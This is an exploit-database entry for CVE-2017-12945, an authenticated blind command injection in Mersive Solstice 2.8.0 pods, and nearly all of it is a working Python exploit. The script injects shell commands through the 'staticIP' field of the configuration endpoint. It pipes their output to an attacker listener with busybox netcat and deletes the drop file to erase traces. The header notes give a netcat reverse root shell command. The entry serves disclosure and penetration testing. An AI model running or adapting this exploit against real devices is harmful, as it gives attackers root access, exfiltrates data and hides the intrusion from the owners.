Mersive Solstice 2.8.0 - Remote Code Execution

🗓️ 28 Nov 2019 00:00:00Reported by Alexandre TeyarType 

Mersive Solstice 2.8.0 - Remote Code Execution: an authenticated, blind OS command injection (CVE-2017-12945) in Solstice devices running firmware prior to 2.8.4. The injection is blind, so to see command output start a netcat listener on the attacking host before running the exploit in piped mode.

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description       : This will exploit an (authenticated) blind OS command injection 
#                     vulnerability present in Solstice devices running versions
#                     of the firmware prior to 2.8.4.
# Notes             : To get the command output (in piped mode), a netcat listener
#                     (e.g. 'nc -lkvp <LPORT>') needs to be running on <LHOST> before
#                     the exploit is launched; the pod connects back to it.
#                     To get an interactive root shell use the following syntax
#                     'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
#                     -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
#                     -e /system/bin/sh -i"'.


#!/usr/bin/env python3

import argparse
import logging
import requests
import sys
import time


def parse_args():
    """Build the command-line parser and return the parsed namespace.

    Options:
      -d / --debug        sets ``loglevel`` to logging.DEBUG (default logging.INFO)
      -lh / --lhost       listener address; enables piped mode when given
      -lp / --lport       listener port as a string (default "4444")
      -p / --payload      shell command to inject (required)
      -pass / --password  target administrator password (default "")
      -rh / --rhost       target address (required)

    Returns:
        argparse.Namespace with the attributes listed above.
    """
    parser = argparse.ArgumentParser(
        description="Solstice Pod Blind Command Injection"
    )

    # (flags, keyword arguments) pairs, in the original declaration order so
    # the generated --help output is unchanged.
    option_specs = [
        (
            ("-d", "--debug"),
            {
                "dest": "loglevel",
                "help": "enable verbose debug mode",
                "required": False,
                "action": "store_const",
                "const": logging.DEBUG,
                "default": logging.INFO,
            },
        ),
        (
            ("-lh", "--lhost"),
            {
                "dest": "lhost",
                "help": "the listening address",
                "required": False,
                "type": str,
            },
        ),
        (
            ("-lp", "--lport"),
            {
                "dest": "lport",
                "help": "the listening port - default 4444",
                "required": False,
                "default": "4444",
                "type": str,
            },
        ),
        (
            ("-p", "--payload"),
            {
                "dest": "payload",
                "help": "the command to execute",
                "required": True,
                "type": str,
            },
        ),
        (
            ("-pass", "--password"),
            {
                "dest": "password",
                "help": "the target administrator password",
                "required": False,
                "default": "",
                "type": str,
            },
        ),
        (
            ("-rh", "--rhost"),
            {
                "dest": "rhost",
                "help": "the target address",
                "required": True,
                "type": str,
            },
        ),
    ]

    for flags, kwargs in option_specs:
        parser.add_argument(*flags, **kwargs)

    return parser.parse_args()


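def main():
    """Script entry point: parse the CLI, inject the payload, optionally pull back its output.

    Two modes, chosen by whether a listener address (-lh) was supplied:
      * blind: the payload is injected once and nothing is read back;
      * piped: the payload's stdout/stderr are redirected to
        /data/local/tmp/rce.tmp on the pod, a second injection streams that
        file to LHOST:LPORT with ``busybox nc``, and a third one deletes it.

    The cleanup injection is run from a ``finally`` so the drop file is not
    left on the target when the retrieval step fails (send_payload exits the
    process on request errors). Ctrl+C exits with status 0.
    """
    try:
        args = parse_args()

        lhost = args.lhost
        lport = args.lport
        password = args.password
        rhost = args.rhost

        logging.basicConfig(
            datefmt="%H:%M:%S",
            format="%(asctime)s: %(levelname)-8s %(message)s",
            handlers=[logging.StreamHandler()],
            level=args.loglevel
        )

        # Piped mode needs both a listener address and port; lport always
        # has a default, so in practice -lh alone switches the mode on.
        piped = bool(lhost and lport)

        if piped:
            # Redirect stdout and stderr to the drop file so the next
            # injection can ship it back to the listener.
            payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
            logging.info("attacker listening address: %s:%s", lhost, lport)
        else:
            payload = args.payload

        logging.info("solstice pod address: %s", rhost)

        if password:
            # Do not echo the credential itself: console output routinely
            # ends up in engagement notes, tickets and screenshots.
            logging.info(
                "solstice pod administrator password: provided (%d characters)",
                len(password)
            )

        # Send the payload to be executed
        logging.info("sending the payload...")
        send_payload(rhost, password, payload)

        if piped:
            try:
                # 'nc <LHOST> <LPORT> < <FILE>' streams the captured output
                # to the attacker's listener.
                payload = (
                    "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
                        lhost, lport
                    )
                )

                logging.info("retrieving the results...")
                send_payload(rhost, password, payload)
            finally:
                # Erase exploitation traces even if retrieval bailed out.
                logging.info("erasing exploitation traces...")
                send_payload(rhost, password, "rm -f /data/local/tmp/rce.tmp")

    except KeyboardInterrupt:
        logging.warning("'CTRL+C' pressed, exiting...")
        sys.exit(0)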


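def send_payload(rhost, password, payload, timeout=15):
    """Inject one shell command through the pod's ``/Config/service/saveData`` endpoint.

    The injection point is the ``staticIP`` field of the Ethernet
    configuration: the value sent is ``"; <payload>"``, so whatever follows
    the semicolon is executed as a separate command by the firmware (as a
    root shell, per the header notes). Nothing is returned to the caller —
    the vulnerability is blind; the HTTP reply is only logged at DEBUG.

    Args:
        rhost: target host or IP; the request goes to ``http://<rhost>/...``.
        password: administrator password, sent in the JSON body (may be "").
        payload: shell command to inject; logged at INFO.
        timeout: seconds to wait for connect/read before giving up. Without
            it a silent or filtered target hangs the script forever.

    Security notes:
        The transport is plain HTTP, so the administrator password and the
        payload cross the wire in cleartext.

    Exits the process with status 1 on any ``requests`` error so a wrapper
    script can distinguish failure from success.
    """
    URL = "http://{}/Config/service/saveData".format(rhost)

    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "http://{}/Config/config.html".format(rhost)
    }

    data = {
        "m_networkCuration":
        {
            "ethernet":
            {
                "dhcp": False,
                # Injection point: the leading ';' terminates the command the
                # firmware builds around this value.
                "staticIP": "; {}".format(payload),
                "gateway": "",
                "prefixLength": 24,
                "dns1": "",
                "dns2": ""
            }
        },
        "password": "{}".format(password)
    }

    # To inspect the traffic in Burp, pass
    # proxies={"http": "http://127.0.0.1:8080"} to requests.post below.

    try:
        logging.info("%s", payload)

        response = requests.post(
            URL,
            headers=headers,
            json=data,
            timeout=timeout
        )

        if not response.ok:
            # A non-2xx reply most likely means the command was never queued;
            # surface it rather than silently moving on to the next step.
            logging.warning("unexpected HTTP status %s", response.status_code)

        try:
            logging.debug("%s", response.json())
        except ValueError:
            # Non-JSON body (e.g. an error page): show what came back
            # instead of crashing on the decode.
            logging.debug("%s", response.text)

        # Give the injected command time to run before the caller sends
        # the next one (the three injections are sequenced, not chained).
        time.sleep(2)

    except requests.exceptions.RequestException as ex:
        logging.error("%s", ex)
        sys.exit(1)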


if __name__ == "__main__":
    # Run only when executed as a script, not when imported (e.g. to reuse
    # send_payload from another tool).
    main()

9High risk
Vulners AI Score9
CVSS 3.1: 8.8
CVSS 2: 9
EPSS: 0.25432